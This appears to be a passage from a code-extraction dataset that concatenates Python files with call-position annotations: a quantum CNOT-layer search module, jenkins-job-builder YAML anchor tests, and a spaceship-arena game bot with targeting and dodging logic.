(13334, 13347), True, 'import numpy as np\n'), ((13349, 13365), 'numpy.transpose', 'np.transpose', (['zn'], {}), '(zn)\n', (13361, 13365), True, 'import numpy as np\n')] |
import time
import numpy as np
from tqdm import tqdm
from utils import RandomCNOT, RandomCNOTs
def SimulatedAnnealing(quantum_count, layer_count, solver, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score or np.random.randint(epochs)>epoch:
cnot_seed = cnot_layers
if sc>best_score:
best_score = sc
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('epoch %d, iter %d, Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(epoch, i, sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def SequenceJitter(quantum_count, layer_count, solver, init_epochs=10, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
print('Init cnot seed.')
for _ in tqdm(range(init_epochs)):
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
cnot_seed = cnot_layers
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def RandomSearch(cnot_creater, solver, epochs=100, save_path=None):
'''
随机搜索
Parameters:
cnot_creater: 生成CNOT层的可执行对象
solver: 一个可执行对象,给定网络结构后,求解网络参数的求解器
epochs: 随机搜索的轮数
save_path: 保存最佳结果的路径
'''
best_score = 0
start_time = time.time()
for epoch in range(epochs):
cnot_layers = cnot_creater()
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
best_model = model
if save_path is not None:
with open(save_path, 'w') as f:
f.write(best_model)
print('No_%d: score = %g, best_score = %g, time = %gs'%(epoch, sc, best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model
| [
"utils.RandomCNOTs",
"numpy.random.randint",
"time.time",
"utils.RandomCNOT"
] | [((247, 286), 'utils.RandomCNOTs', 'RandomCNOTs', (['quantum_count', 'layer_count'], {}), '(quantum_count, layer_count)\n', (258, 286), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((591, 602), 'time.time', 'time.time', ([], {}), '()\n', (600, 602), False, 'import time\n'), ((2114, 2125), 'time.time', 'time.time', ([], {}), '()\n', (2123, 2125), False, 'import time\n'), ((3177, 3188), 'time.time', 'time.time', ([], {}), '()\n', (3186, 3188), False, 'import time\n'), ((1734, 1773), 'utils.RandomCNOTs', 'RandomCNOTs', (['quantum_count', 'layer_count'], {}), '(quantum_count, layer_count)\n', (1745, 1773), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((744, 769), 'utils.RandomCNOT', 'RandomCNOT', (['quantum_count'], {}), '(quantum_count)\n', (754, 769), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((2267, 2292), 'utils.RandomCNOT', 'RandomCNOT', (['quantum_count'], {}), '(quantum_count)\n', (2277, 2292), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((846, 871), 'numpy.random.randint', 'np.random.randint', (['epochs'], {}), '(epochs)\n', (863, 871), True, 'import numpy as np\n'), ((3596, 3607), 'time.time', 'time.time', ([], {}), '()\n', (3605, 3607), False, 'import time\n'), ((1404, 1415), 'time.time', 'time.time', ([], {}), '()\n', (1413, 1415), False, 'import time\n'), ((2805, 2816), 'time.time', 'time.time', ([], {}), '()\n', (2814, 2816), False, 'import time\n')] |
#!/usr/bin/env python
#
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import yaml
from testtools import ExpectedException
from yaml.composer import ComposerError
from jenkins_jobs.config import JJBConfig
from jenkins_jobs.parser import YamlParser
from tests import base
def _exclude_scenarios(input_filename):
return os.path.basename(input_filename).startswith("custom_")
class TestCaseLocalYamlInclude(base.JsonTestCase):
"""
Verify application specific tags independently of any changes to
modules XML parsing behaviour
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(
fixtures_path, "yaml", "json", filter_func=_exclude_scenarios
)
def test_yaml_snippet(self):
if os.path.basename(self.in_filename).startswith("exception_"):
with ExpectedException(ComposerError, "^found duplicate anchor .*"):
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
else:
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
class TestCaseLocalYamlAnchorAlias(base.YamlTestCase):
"""
Verify yaml input is expanded to the expected yaml output when using yaml
anchors and aliases.
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(fixtures_path, "iyaml", "oyaml")
class TestCaseLocalYamlIncludeAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_multiple_same_anchor_in_multiple_toplevel_yaml(self):
"""
Verify that anchors/aliases only span use of '!include' tag
To ensure that any yaml loaded by the include tag is in the same
space as the top level file, but individual top level yaml definitions
are treated by the yaml loader as independent.
"""
files = [
"custom_same_anchor-001-part1.yaml",
"custom_same_anchor-001-part2.yaml",
]
jjb_config = JJBConfig()
jjb_config.jenkins["url"] = "http://example.com"
jjb_config.jenkins["user"] = "jenkins"
jjb_config.jenkins["password"] = "password"
jjb_config.builder["plugins_info"] = []
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
class TestCaseLocalYamlRetainAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_retain_anchors_default(self):
"""
Verify that anchors are NOT retained across files by default.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
# use the default value for retain_anchors
jjb_config.validate()
j = YamlParser(jjb_config)
with ExpectedException(yaml.composer.ComposerError, "found undefined alias.*"):
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
def test_retain_anchors_enabled(self):
"""
Verify that anchors are retained across files if retain_anchors is
enabled in the config.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
jjb_config.yamlparser["retain_anchors"] = True
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
| [
"testtools.ExpectedException",
"os.path.join",
"os.path.dirname",
"os.path.basename",
"jenkins_jobs.config.JJBConfig",
"jenkins_jobs.parser.YamlParser",
"tests.base.get_scenarios"
] | [((1172, 1258), 'tests.base.get_scenarios', 'base.get_scenarios', (['fixtures_path', '"""yaml"""', '"""json"""'], {'filter_func': '_exclude_scenarios'}), "(fixtures_path, 'yaml', 'json', filter_func=\n _exclude_scenarios)\n", (1190, 1258), False, 'from tests import base\n'), ((1879, 1930), 'tests.base.get_scenarios', 'base.get_scenarios', (['fixtures_path', '"""iyaml"""', '"""oyaml"""'], {}), "(fixtures_path, 'iyaml', 'oyaml')\n", (1897, 1930), False, 'from tests import base\n'), ((1117, 1142), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1132, 1142), False, 'import os\n'), ((1824, 1849), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1839, 1849), False, 'import os\n'), ((2025, 2050), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (2040, 2050), False, 'import os\n'), ((2581, 2592), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (2590, 2592), False, 'from jenkins_jobs.config import JJBConfig\n'), ((2839, 2861), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (2849, 2861), False, 'from jenkins_jobs.parser import YamlParser\n'), ((3030, 3055), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3045, 3055), False, 'import os\n'), ((3318, 3329), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (3327, 3329), False, 'from jenkins_jobs.config import JJBConfig\n'), ((3423, 3445), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (3433, 3445), False, 'from jenkins_jobs.parser import YamlParser\n'), ((3898, 3909), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (3907, 3909), False, 'from jenkins_jobs.config import JJBConfig\n'), ((4007, 4029), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (4017, 4029), False, 'from jenkins_jobs.parser import YamlParser\n'), ((856, 888), 'os.path.basename', 'os.path.basename', (['input_filename'], {}), '(input_filename)\n', (872, 888), False, 'import os\n'), ((3459, 3532), 'testtools.ExpectedException', 'ExpectedException', (['yaml.composer.ComposerError', '"""found undefined alias.*"""'], {}), "(yaml.composer.ComposerError, 'found undefined alias.*')\n", (3476, 3532), False, 'from testtools import ExpectedException\n'), ((1314, 1348), 'os.path.basename', 'os.path.basename', (['self.in_filename'], {}), '(self.in_filename)\n', (1330, 1348), False, 'import os\n'), ((1392, 1454), 'testtools.ExpectedException', 'ExpectedException', (['ComposerError', '"""^found duplicate anchor .*"""'], {}), "(ComposerError, '^found duplicate anchor .*')\n", (1409, 1454), False, 'from testtools import ExpectedException\n'), ((2884, 2919), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (2896, 2919), False, 'import os\n'), ((4052, 4087), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (4064, 4087), False, 'import os\n'), ((3560, 3595), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (3572, 3595), False, 'import os\n')] |
from bot_interface import *
import math
class SeijiBot(BotBase):
def __init__(self):
self.initialized = False
def initialize(self, gamestate):
gamestate.log("Initializing...")
#Getting UID
self.uid = gamestate.bot.uid
gamestate.log("This ship has uid " + str(self.uid))
#Getting time step
self.step = gamestate.timestep
gamestate.log("Initialized with timestep of " + str(self.step) + "s")
gamestate.log("Ships have a " + str(gamestate.ships[self.uid].radius) + "m radius")
#Setting Global constants
self.mass = 1
self.main_thrust = 30
self.side_thrust = 15
self.side_thrust_offset = 2
self.laser_charge_time = .5
self.initialized = True
#From here are some useful functions
#Side functions
def solveQuad(self, a, b, c):
if a == 0:
return None
delta = b**2 - 4*a*c
if delta < 0:
return None
if delta == 0:
return (-b)/(2*a), (-b)/(2*a)
delta = math.sqrt(delta)
return (((-b)-delta)/(2*a), ((-b)+delta)/(2*a))
def dist(self, obj1, obj2):
return math.sqrt((obj1.posx - obj2.posx)**2 + (obj1.posy - obj2.posy)**2)
def toRad(self, angle):
return (float(angle)/180)*math.pi
def sign(self, n):
if n == 0:
return 0
return n/abs(n)
def fmod(self, n, k):
d = math.floor(n/k)
return n - k*d
def glob_loc(self, x1, y1, angle, x2, y2):
rx, ry = x2 - x1, y2 - y1
tx, ty = math.cos(-angle) * rx - math.sin(-angle) * ry, math.cos(-angle) * ry + math.sin(-angle) * rx
return tx, ty
def normalize(self, vec):
sqrl = 0
for i in vec:
sqrl += i**2
l = math.sqrt(sqrl)
if l == 0.0:
return vec
res = []
for i in vec:
res.append(i/l)
return res
def invert(self, vec):
return [-i for i in vec]
#Movement functions
#Change angular speed - It doesn't change linear velocity
#Returns -> thruster value
def angularSpeed(self, ship, final_speed):
k = .1
vel = self.toRad(ship.velang)
delta = final_speed - vel
ret = delta*k
if ret > 1:
ret = 1
elif ret < -1:
ret = -1
return -ret
def angDelta(self, ship, angle):
delta = self.fmod(angle + 2*math.pi, 2*math.pi) - self.fmod(self.fmod(self.toRad(ship.ang), 2*math.pi) + 2*math.pi, 2*math.pi)
if abs(delta) > math.pi:
delta = (2*math.pi - abs(delta))*self.sign(-delta)
return delta
#Control ship rotation to certain angle - It doesn't change linear velocity
#Returns -> thruster value
def lookAt(self, ship, final_ang):
kP, kD = .6, 3.5
out = -kP*self.angDelta(ship, final_ang) + kD*self.toRad(ship.velang)*self.step
if out > 1:
out = 1
elif out < -1:
out = -1
return out
#Accelerate ship towards certain coordinate - It doesn't change velang
#Returns -> main thruster value, frontal thruster value, back thruster value
def accelerateTo(self, ship, towx, towy, pot = 1):
tstep = self.step
fmax = self.main_thrust/self.mass
angles = self.toRad(ship.ang)
x, y = self.glob_loc(ship.posx, ship.posy, angles, towx, towy)
res = [0, 0, 0]
cx, cy = self.normalize([x, y])
res[0] = -cy*pot
res[1] = cx*pot
res[2] = cx*pot
return res
#Estimating objects
def estimateObj(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateRock(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateShip(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.ang += objest.velang*time
return objest
def estimateLaser(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.lifetime -= time
return objest
#Estimating Time of Collision
#Returns -> Time(seconds) for collision of obj1 and obj2: MIN, MAX
def toC(self, obj1, obj2, error_margin):
A = obj1.posx
a = obj1.velx
B = obj2.posx
b = obj2.velx
C = obj1.posy
c = obj1.vely
D = obj2.posy
d = obj2.vely
R = obj1.radius + error_margin/2
r = obj2.radius + error_margin/2
Asq = A**2
asq = a**2
Bsq = B**2
bsq = b**2
Csq = C**2
csq = c**2
Dsq = D**2
dsq = d**2
Rsq = R**2
rsq = r**2
div = asq - 2*a*b + bsq + csq - 2*c*d + dsq
delta = (-Asq*csq + 2*Asq*c*d - Asq*dsq + 2*A*B*csq - 4*A*B*c*d + 2*A*B*dsq + 2*A*C*a*c - 2*A*C*a*d - 2*A*C*b*c + 2*A*C*b*d - 2*A*D*a*c + 2*A*D*a*d + 2*A*D*b*c - 2*A*D*b*d - Bsq*csq + 2*Bsq*c*d - Bsq*dsq - 2*B*C*a*c + 2*B*C*a*d + 2*B*C*b*c - 2*B*C*b*d + 2*B*D*a*c - 2*B*D*a*d - 2*B*D*b*c + 2*B*D*b*d - Csq*asq + 2*Csq*a*b - Csq*bsq + 2*C*D*asq - 4*C*D*a*b + 2*C*D*bsq - Dsq*asq + 2*Dsq*a*b - Dsq*bsq + Rsq*asq - 2*Rsq*a*b + Rsq*bsq + Rsq*csq - 2*Rsq*c*d + Rsq*dsq + 2*R*asq*r - 4*R*a*b*r + 2*R*bsq*r + 2*R*csq*r - 4*R*c*d*r + 2*R*dsq*r + asq*rsq - 2*a*b*rsq + bsq*rsq + csq*rsq - 2*c*d*rsq + dsq*rsq)
minusb = (-A*a + A*b + B*a - B*b - C*c + C*d + D*c - D*d)
if div == 0 or delta < 0:
return None
else:
res0 = (minusb - math.sqrt(delta))/(div)
res1 = (minusb + math.sqrt(delta))/(div)
return res0, res1
#Predictive shooting of moving target
#Returns -> Time(seconds) for shoot to reach target on line, coordinates x and y for the shoot to be 'centered'
def predShoot(self, ship, target, speed, gamestate):
tx = target.posx - ship.posx
ty = target.posy - ship.posy
tvx = target.velx - ship.velx
tvy = target.vely - ship.vely
a = tvx**2 + tvy**2 - speed**2
b = 2*(tvx*tx + tvy * ty)
c = tx**2 + ty**2
r = self.solveQuad(a, b, c)
if r == None:
return None
else:
r0, r1 = r
if r1 < 0 and r0 < 0:
return None
elif r0 < 0:
coords = (target.posx + tvx*r1, target.posy + tvy*r1)
return r1, coords
else:
coords = (target.posx + tvx*r0, target.posy + tvy*r0)
return r0, coords
target = None
ok = False
ltick = 0
def process(self, gamestate):
if not self.initialized:
self.initialize(gamestate)
return Action(0, .1, .1, 0)
try:
sgargs = gamestate.ships[self.target]
except:
self.target = None
self.ok = False
if len(gamestate.ships) > 1 and not self.ok:
for i in gamestate.ships:
if i is not self.uid:
self.ok = True
self.target = i
gamestate.log("Following ship " + str(i))
break
s_ship = gamestate.ships[self.uid]
zero = 0
out = [0, 0, 0]
avoid = [0, 0, 0]
rotation_out = 0
rot_mean = 0
out_s = 0
self.ltick = gamestate.tick
#Targeting and shooting
for ship_uid in gamestate.ships:
if self.uid == ship_uid:
continue
ship = gamestate.ships[ship_uid]
if self.dist(ship, s_ship) < self.dist(gamestate.ships[self.target], s_ship):
self.target = ship_uid
if(self.target is not None):
targetp = self.estimateShip(gamestate.ships[self.target], self.step)
shipp = self.estimateShip(s_ship, self.step)
prediction0 = None
prediction1 = None
prediction2 = None
shoot_type = 0
min_time = 9999
if shipp.charge >= 3:
predictiont = self.predShoot(shipp, targetp, 75, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .8:
prediction2 = predictiont
if shipp.charge >= 2:
predictiont = self.predShoot(shipp, targetp, 50, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .6:
prediction1 = predictiont
if shipp.charge >= 1:
predictiont = self.predShoot(shipp, targetp, 25, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .4:
prediction0 = predictiont
time, coords = None, None
if prediction2 is not None:
time, coords = prediction2
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
if prediction1 is not None:
time, coords = prediction1
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
if prediction0 is not None:
time, coords = prediction0
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if time is not None:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
rot_mean += 1
else:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - targetp.posx,targetp.posy - shipp.posy ))
#Avoidance code
#Avoid rocks
rock_repel_r = 15
rock_repel_t = 5
rock_less = 9999
rock_less_uid = None
for rock_uid in gamestate.rocks:
rock = gamestate.rocks[rock_uid]
dist = self.dist(s_ship, rock)
final = [0, 0, 0]
if dist <= rock_repel_r:
tmp = self.accelerateTo(s_ship, 2*s_ship.posx - rock.posx, 2*s_ship.posy - rock.posy, math.sqrt((rock_repel_r-dist)/rock_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(rock, s_ship, .1)
if not toc == None:
if toc[0] > 0:
gamestate.log("Rock of uid " + str(rock_uid) + ": Will collide in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
rck = self.estimateRock(rock, toc[0])
if toc[0] <= rock_repel_t:
tmp = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy, math.sqrt((rock_repel_t-toc[0])/rock_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if rock_less > toc[0]:
rock_less = toc[0]
rock_less_uid = rock_uid
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Avoid lasers
laser_repel_r = 15
laser_repel_t = 3
laser_less = 9999
laser_less_uid = None
for laser_uid in gamestate.lasers:
laser = gamestate.lasers[laser_uid]
dist = self.dist(s_ship, laser)
final = [0, 0, 0]
if dist <= laser_repel_r:
tmp = self.accelerateTo(s_ship, 2*s_ship.posx - laser.posx, 2*s_ship.posy - laser.posy, math.sqrt((laser_repel_r-dist)/laser_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(laser, s_ship, .1)
if not toc == None:
if toc[0] > 0:
if toc[0] <= laser.lifetime:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will hit in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
lsr = self.estimateLaser(laser, toc[0])
shipp = self.estimateShip(s_ship, self.step)
las = self.estimateLaser(laser, self.step)
prediction = self.predShoot(shipp, las, 75, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
gamestate.log(str())
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
prediction = self.predShoot(shipp, las, 50, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
prediction = self.predShoot(shipp, las, 25, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if toc[0] <= laser_repel_t:
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-toc[0])/laser_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if laser_less > toc[0]:
laser_less = toc[0]
laser_less_uid = laser_uid
else:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will not hit. Just " + ('%.2f' % laser.lifetime) + " seconds remaining.")
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Try not to collide with the arena
arenac = 1
if math.sqrt(s_ship.posx**2 + s_ship.posy**2) > gamestate.arenaRadius - 5:
tmp = self.accelerateTo(s_ship, 0, 0, (math.sqrt(s_ship.posx**2 + s_ship.posy**2) - (gamestate.arenaRadius - 5))/5)
out[0] += tmp[0]*arenac
out[1] += tmp[1]*arenac
out[2] += tmp[2]*arenac
#Stay at a distance from target
attrcnt = .3
if self.target is not None:
target_r = 30
dist = self.dist(s_ship, gamestate.ships[self.target])
linpot = 0
if target_r-dist is not zero:
linpot = target_r/(dist - target_r)
tmp = self.accelerateTo(s_ship, gamestate.ships[self.target].posx, gamestate.ships[self.target].posy, (linpot**8)*self.sign(linpot))
tmp = self.normalize(tmp)
mx = max(abs(tmp[0]), abs(tmp[1]), abs(tmp[2]))
if mx != 0:
mx = 1/mx
avoid[0] += tmp[0]*mx*attrcnt
avoid[1] += tmp[1]*mx*attrcnt
avoid[2] += tmp[2]*mx*attrcnt
#Keep track of ship headings/ships targeting self
predeyesight = .5
for ship_uid in gamestate.ships:
if ship_uid is self.uid:
continue
ship = gamestate.ships[ship_uid]
targetp = self.estimateShip(s_ship, self.step)
shipp = self.estimateShip(ship, self.step)
prediction = None
shoot_type = 0
if shipp.charge < 2 and shipp.charge >= 1:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = None
prediction2 = None
elif shipp.charge < 3:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = None
else:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = self.predShoot(shipp, targetp, 75, gamestate)
if prediction2 is not None:
time, coords = prediction2
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 75*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 75*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 75m/s...")
elif prediction1 is not None:
time, coords = prediction1
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 50*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 50*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 50m/s...")
if prediction0 is not None:
time, coords = prediction0
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 25*math.sin(self.toRad(shipp.ang))
laser.vely = shipp.posy + 25*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 25m/s...")
#apply rotations and final weight calculation
peravd = 2
out[0] += avoid[0]*peravd
out[1] += avoid[1]*peravd
out[2] += avoid[2]*peravd
mx = 1
#out = self.normalize(out)
#mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
#if mx != 0:
# mx = 1/mx
#mx = 1
rotmulti = 1
#out[0] = 0
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
#out_s = 0
#out = [0, 0, 0]
#virtual 'friction'
'''kF = .5
vel = [s_ship.posx-s_ship.velx, s_ship.posy-s_ship.vely]
mvel = math.sqrt(s_ship.velx**2 + s_ship.vely**2)
vel = self.normalize(vel)
tmp = self.accelerateTo(s_ship, vel[0], vel[1], kF)
out[0] += tmp[0]*(mvel/30)
out[1] += tmp[1]*(mvel/30)
out[2] += tmp[2]*(mvel/30)'''
#Emergency overwrite - in case of iminent danger
rotation_out = 0
if rock_less <= 1:
out_s = 1
gamestate.log("Overwriting controls: rock 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateRock(gamestate.rocks[rock_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if rock_less <= .5:
gamestate.log("Overwriting controls: rock .5 of ID " + str(rock_less_uid))
shp = self.estimateShip(s_ship, rock_less)
rck = self.estimateRock(gamestate.rocks[rock_less_uid], rock_less)
out = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy)
out = self.normalize(out)
out = self.invert(out)
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
if laser_less <= 1.5:
out_s = 1
gamestate.log("Overwriting controls: laser 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateLaser(gamestate.lasers[laser_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if laser_less <= .5:
gamestate.log("Overwriting controls: laser .5 of ID " + str(laser_less_uid))
shp = self.estimateShip(s_ship, laser_less)
lsr = self.estimateLaser(gamestate.lasers[laser_less_uid], laser_less)
out = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy)
out = self.normalize(out)
out = self.invert(out)
#@out[0] = -out[0]
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
return Action(-out[0]*mx, out[1]*mx, out[2]*mx, out_s)
gamestate.log(str(s_ship.vely))
return Action(1, 0, 0, 0)
GameState(SeijiBot()).connect()
| [
"math.floor",
"math.sqrt",
"math.cos",
"math.atan2",
"math.sin"
